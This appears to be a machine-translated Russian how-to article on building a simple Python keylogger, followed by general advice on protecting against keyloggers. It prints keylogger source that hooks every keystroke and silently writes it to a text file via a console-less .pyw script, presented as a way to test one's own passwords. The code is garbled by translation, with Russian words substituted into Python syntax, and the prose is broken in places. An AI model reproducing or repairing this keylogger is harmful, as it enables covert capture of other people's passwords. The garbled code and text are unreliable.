Кейлоггеры — это тип инструмента, который хакеры используют для кражи паролей. Это еще одна из многих угроз, существующих в сети. Однако в его создании нет ничего сложного. Вы просто должны иметь необходимые знания и ряд приложений. Таким образом, вы сможете проверить свои ключи и подготовиться к реальной атаке, в ходе которой они могут сломать ваши ключи. Мы объясним, как вы можете это сделать.
Как работает кейлоггер
Миссия этого типа вредоносного ПО состоит в том, чтобы зарегистрировать все ключи что мы нажимаем на клавиатуре. Таким образом, каждый раз, когда мы заходим в почту, Facebook или любой другой сервис, программа будет записывать что мы ставим и тем самым украсть код доступа и логин.
Можно сказать, что кейлоггер является одним из старейших вредоносных инструментов. Хотя в настоящее время антивирусы способны обнаруживать большинство из них, правда в том, что хакеры продолжают совершенствовать свои методы и умудряются достигать большего количества жертв как на компьютерах, так и на мобильных устройствах.
Это обычно скрыт в файле которые мы загружаем через Интернет, приложение, которое мы установили, и тому подобное. Он работает в фоновом режиме в нашей системе, и мы не знаем, что он работает, и при этом записывает все нажатия клавиш. Позже это может быть отправлено на сервер, контролируемый злоумышленниками.
Этот кейлоггер может даже быть разработан исключительно для записывать пароли на системном уровне и хранятся на самом компьютере. Если это общая команда, кто-то еще может видеть, какие ключи.
Шаги для создания
Мы собираемся объяснить, как мы можем создать кейлоггер локально , чтобы проверить наши пароли. Создание одного удаленно является более полным. Что мы собираемся сделать, так это записать нажатия клавиш нашего компьютера. Имейте в виду, что мы должны делать это только для личного использования, чтобы проверить наши собственные пароли и не повлиять на третьих лиц, которые могут использовать это оборудование.
Открыть блокнот
Первое, что нам нужно сделать, это открыть Windows Блокнот или любое другое приложение, где мы можем писать в виде простого текста. Подойдет даже сам редактор Python. В том документе, который мы создали, мы должны написать следующий код:
</pre>
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location
file_log = 'keyloggeroutput.txt'
def OnKeyboardEvent (событие):
logging.basicConfig (имя файла = file_log, уровень = logging.DEBUG, формат = '% (сообщение) s')
chr (событие.Ascii)
logging.log(10, chr (event.Ascii))
вернуть True
ooks_manager = pyHook.HookManager()
ooks_manager.KeyDown = OnKeyboardEvent
ooks_manager.HookKeyboard()
pythoncom.PumpMessages ()
Как только это будет сделано, следующее, что нужно сделать, это сохранить файл в формат pyw . Например, мы можем назвать его Keylogger.pyw. Просто с этими шагами у нас будет готовый кейлоггер, написанный на Python. С этого момента мы сможем записывать все нажатия клавиш на клавиатуре нашего оборудования. Все это, что вы собираетесь записывать, будет сохранено в отдельном документе.
Загрузите и установите Python
Питон должен быть установлен для его работы. Если он у вас не установлен в Windows, вы можете зайти на официальный сайт и скачать последнюю версию. В настоящее время это 3.10.1. Кроме того, для бесперебойной работы необходимо установить PyHook и Pywin32.
Когда он будет установлен и готов к использованию, нам нужно будет только выполнить файл, который мы создали ранее. Мы должны идти по пути, где мы спасаем Кейлоггер.pyw (или любое другое имя, которое мы хотели бы ему дать) и дважды щелкните. С этого момента он начнет записывать любое нажатие клавиши.
Процесс в диспетчере задач
Если вы хотите проверить, работает ли он правильно или нет, вам просто нужно перейти на Диспетчер задач Windows . Для этого необходимо нажать комбинацию клавиш Ctrl+Alt+Del и открыть его там. Появятся все запущенные процессы и в данном случае нас интересует pythow.exe.
Если вы хотите закончить его, все, что вам нужно сделать, это зайти в диспетчер задач, щелкнуть процесс и нажать «Готово». Он автоматически перестанет регистрировать нажатия клавиш на клавиатуре и сгенерирует текстовый документ в формате .txt. Здесь появится все, что было нажато.
Посмотреть файл с паролями
Чтобы увидеть текстовый файл со всеми ключами, которые он регистрирует (а также с любым нажатием клавиши), мы должны перейти в каталог, где был файл в формате .pyw, либо Keylogger.pyw, либо любое другое имя, которое мы ему вставили, и текстовый файл с именем keyloggeroutput. txt появится там.
После открытия мы увидим что-то похожее на то, что показано на изображении выше. Мы сможем увидеть ключи, которые он регистрирует. Это просто, идеально — иметь возможность проверять пароли, которые мы вводим в Windows, и видеть, в какой степени наши ключи могут быть украдены в случае более сложной атаки, которую они могут контролировать удаленно.
Советы, которые нужно защитить
Увидев, как мы можем создать простой кейлоггер для личного использования на нашем компьютере, мы собираемся дать несколько советов, чтобы не стать жертвами этого типа атак. Очень важно быть защищенным, чтобы наши коды доступа нельзя украсть.
Программы безопасности
Во-первых, это программы безопасности. А хороший антивирус необходимо для предотвращения проникновения вирусов. Например, мы можем назвать сам Защитник Windows, Avast, Bitdefender или любой другой. Есть много вариантов, но мы всегда должны выбрать один из гарантий.
Помимо антивируса, у нас также могут быть другие приложения, такие как брандмауэр или даже надстройки для браузера. Во всех случаях они помогут повысить безопасность и избежать опасных подключений, которые могут быть использованы для проникновения кейлоггеров и других угроз.
Обновите все
Иногда уязвимости появляются в системах . Существуют недостатки безопасности, которые затрагивают определенные приложения, такие как браузер. Это может привести к проникновению вредоносных программ и поставить под угрозу нашу конфиденциальность. Чтобы этого не произошло, важно иметь последние версии.
Безопасность патчи используются для исправления этих проблем. У нас должны быть обновлены Windows, браузер и любая программа, которую мы используем. Даже драйверы для сетевой карты также должны быть обновлены, что снижает риск возникновения проблем.
Используйте официальные приложения
Конечно, мы всегда должны использовать официальные программы . Это правда, что иногда у нас есть возможность иметь некоторые приложения с дополнительными функциями, но, поскольку они не являются официальными, мы не знаем, являются ли они гарантиями и как они могут повлиять на нас.
Хакер мог создать программу, которая претендует на подлинность, но на самом деле используется для кражи информации или кражи кейлоггера. Чтобы избежать этого, мы должны всегда загружать программное обеспечение из официальных магазинов и безопасных страниц.
Здравый смысл
Еще один совет — не забывайте о здравом смысле. Очень важно избегать ошибок , такие как загрузка файлов, которые доходят до нас через e-mail без проверки личности или открытия ссылок через сторонние сайты, которые могли быть созданы только для кражи данных.
Большинство атак происходит при взаимодействии с пользователем. Даже кейлоггеры, которые во многих случаях должны загрузить файл или установить программу, которую мы предварительно скачали с небезопасной страницы.
Короче говоря, создать кейлоггер для личного использования, как мы видели, очень просто. Однако злоумышленник может создать более изощренную и иметь возможность удаленно красть пароли. Очень важно быть защищенным и не совершать ошибок, которые могут повлиять на нас в нашей повседневной жизни.
